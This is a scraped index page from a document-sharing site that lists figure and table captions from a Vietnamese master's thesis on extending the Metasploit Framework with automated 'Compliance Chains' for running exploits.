Hình 4.6. Lập lịch tự động chạy Chain - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 4.6. Lập lịch tự động chạy Chain (Trang 40)
Bảng 4.1. Danh sách các mã khai thác - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Bảng 4.1. Danh sách các mã khai thác (Trang 45)
Bảng 4.2. Danh sách Chains - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Bảng 4.2. Danh sách Chains (Trang 46)
Hình 4.7. Biểu đồ lớp Compliance Chain - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 4.7. Biểu đồ lớp Compliance Chain (Trang 47)
Hình 4.8. Danh sách chức năng trong Compilance Chain - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 4.8. Danh sách chức năng trong Compilance Chain (Trang 48)
Hình 4.9. Hướng dẫn thao tác Compliance Chain - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 4.9. Hướng dẫn thao tác Compliance Chain (Trang 49)
Bước 4.3: Cấu hình Param cho Profile hiện tại profile * params - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
c 4.3: Cấu hình Param cho Profile hiện tại profile * params (Trang 51)
thể được chuyển sang máy khác để dùng như một cấu hình có thể chia sẻ được - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
th ể được chuyển sang máy khác để dùng như một cấu hình có thể chia sẻ được (Trang 57)
Bước 7: Lưu lại các thay đổi (thủ công) vào file cấu hình config.json. File config có - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
c 7: Lưu lại các thay đổi (thủ công) vào file cấu hình config.json. File config có (Trang 57)
Hình 4.10. Nạp kịch bản vào công cụ Compliance Chains     - Luận văn ThS Nâng cấp ứng dụng khai thác các lỗ hổng an ninh Metasploit Framework
Hình 4.10. Nạp kịch bản vào công cụ Compliance Chains (Trang 64)

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN